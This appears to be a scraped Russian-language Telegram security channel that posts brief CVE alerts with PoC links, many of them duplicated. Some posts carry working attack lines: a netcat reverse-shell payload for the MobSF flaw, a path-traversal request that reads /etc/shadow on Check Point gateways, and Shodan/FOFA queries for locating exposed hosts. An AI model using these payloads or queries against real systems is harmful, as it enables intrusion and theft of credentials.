#CVE-2024-21633 - #MobSF Remote code execution (#RCE)
MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.
Пересобрав приложение с ночинкой в
Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути
https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
https://github.com/0x33c0unt/CVE-2024-21633
MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.
Пересобрав приложение с ночинкой в
res/raw/jadx
к примерутакого содержания:
#!/bin/bash
nc host.docker.internal 9001 -e sh
Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути
${decode target path}/res/
https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
https://github.com/0x33c0unt/CVE-2024-21633
В последнем официальном патче #Oracle от января 2024 г была исправлена #RCE уязвимость, основанная на протоколе #Weblogic T3\IIOP #CVE-2024-20931. Уязвимость была представлена в Oracle автором в октябре 2023 года и относится к обходу патча CVE-2023-21839, что влечет за собой новую поверхность атаки для #JNDI.
Описание пока скудное, но думаем скоро появятся статьи с разбором.
https://github.com/GlassyAmadeus/CVE-2024-20931
Описание пока скудное, но думаем скоро появятся статьи с разбором.
https://github.com/GlassyAmadeus/CVE-2024-20931
Новая уязвимость #CVE-2024-21378 в Microsoft Outlook, которая позволяет удаленно выполнять код RCE (Remote Code Execution) aka #Ruller2.
Описание уязвимости:
* Уязвимость возникает из-за недостаточной проверки входных данных в Microsoft Outlook.
* Злоумышленник может отправить специально сформированное электронное письмо, содержащее вредоносный код.
* При открытии письма пользователем, вредоносный код будет выполнен на компьютере.
Потенциальные последствия:
* Злоумышленник может получить удаленный доступ к компьютеру пользователя.
* Это может привести к утечке конфиденциальных данных, установке вредоносного ПО и другим негативным последствиям.
Рекомендации:
* Обновите Microsoft Outlook до последней версии.
* Будьте осторожны при открытии электронных писем, особенно если они содержат вложения или ссылки.
https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/
Описание уязвимости:
* Уязвимость возникает из-за недостаточной проверки входных данных в Microsoft Outlook.
* Злоумышленник может отправить специально сформированное электронное письмо, содержащее вредоносный код.
* При открытии письма пользователем, вредоносный код будет выполнен на компьютере.
Потенциальные последствия:
* Злоумышленник может получить удаленный доступ к компьютеру пользователя.
* Это может привести к утечке конфиденциальных данных, установке вредоносного ПО и другим негативным последствиям.
Рекомендации:
* Обновите Microsoft Outlook до последней версии.
* Будьте осторожны при открытии электронных писем, особенно если они содержат вложения или ссылки.
https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/
🔥ChatGPT-Next-Web SSRF/XSS #CVE-2023-49785
Любителям форков для ChatGPT внимание
по результатам FoFa 40 807 хостов уязвимы https://en.fofa.info/result?qbase64=YXBwPSJDaGF0R1BULU5leHQtV2ViIg%3D%3D
Nuclei Tamplate:
https://github.com/projectdiscovery/nuclei-templates/pull/9319/files
Любителям форков для ChatGPT внимание
по результатам FoFa 40 807 хостов уязвимы https://en.fofa.info/result?qbase64=YXBwPSJDaGF0R1BULU5leHQtV2ViIg%3D%3D
Nuclei Tamplate:
https://github.com/projectdiscovery/nuclei-templates/pull/9319/files
FOFA
FOFA Search Engine
FOFA is a Cyberspace search engine. By conducting Cyberspace mapping, it can help researchers or enterprises quickly match network assets, such as vulnerability impact range analysis, application distribution statistics, and application popularity ranking…
🔍 CVE ID: #CVE-2024-20767
Adobe #ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
Published: 2024-03-18
Base Score: 8.2
Base Severity: HIGH
PoC: https://tttttt.me/proxy_bar/1958
Adobe #ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
Published: 2024-03-18
Base Score: 8.2
Base Severity: HIGH
PoC: https://tttttt.me/proxy_bar/1958
#CVE-2024-3400 OS Command Injection Vulnerability in GlobalProtect Gateway PAN-OS #PaloAlto
https://security.paloaltonetworks.com/CVE-2024-3400
IOC: https://unit42.paloaltonetworks.com/cve-2024-3400/
https://security.paloaltonetworks.com/CVE-2024-3400
IOC: https://unit42.paloaltonetworks.com/cve-2024-3400/
Check Point выпустила экстренное исправление для VPN нулевого дня, используемой в атаках #CVE-2024-24919 CVSS 3.X 7.5
https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-24919
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/
Check Point Remote Access VPN 0-Day
FOFA link
POC:
https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-24919
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/
Check Point Remote Access VPN 0-Day
FOFA link
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
BleepingComputer
Check Point releases emergency fix for VPN zero-day exploited in attacks
Check Point has released hotfixes for a VPN zero-day vulnerability exploited in attacks to gain remote access to firewalls and attempt to breach corporate networks.
cve_2024_30078_check.nasl
2.9 KB
#CVE-2024-30078 Windows #WiFi Driver #RCE
Windows Wi-Fi Driver Remote Code Execution Vulnerability
Новая уязвимость Wi-Fi подвергает риску всех пользователей Windows - исправляйте как можно скорее!
- неавторизованный RCE, затрагивающий драйверы Wi-Fi всех версий Windows, означает, что любой злоумышленник в радиусе действия Wi-Fi может скомпрометировать ваше устройство.
Published: 2024-06-11
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Ресурсы:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078
https://www.forbes.com/sites/daveywinder/2024/06/14/new-wi-fi-takeover-attack-all-windows-users-warned-to-update-now/
Плагин для Nessus прилагается (функционал плагина не соотвествует уязвимости, проверяем).
Windows Wi-Fi Driver Remote Code Execution Vulnerability
Новая уязвимость Wi-Fi подвергает риску всех пользователей Windows - исправляйте как можно скорее!
- неавторизованный RCE, затрагивающий драйверы Wi-Fi всех версий Windows, означает, что любой злоумышленник в радиусе действия Wi-Fi может скомпрометировать ваше устройство.
Published: 2024-06-11
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Ресурсы:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078
https://www.forbes.com/sites/daveywinder/2024/06/14/new-wi-fi-takeover-attack-all-windows-users-warned-to-update-now/
Плагин для Nessus прилагается (функционал плагина не соотвествует уязвимости, проверяем).
Forwarded from APT
🔥 VMware vCenter Server RCE + PrivEsc
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
FOFA
#vmware #vcenter #rce #lpe #cve
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
product:"VMware vCenter Server"
FOFA
app="vmware-vCenter"
#vmware #vcenter #rce #lpe #cve
Forwarded from APT
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc
#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM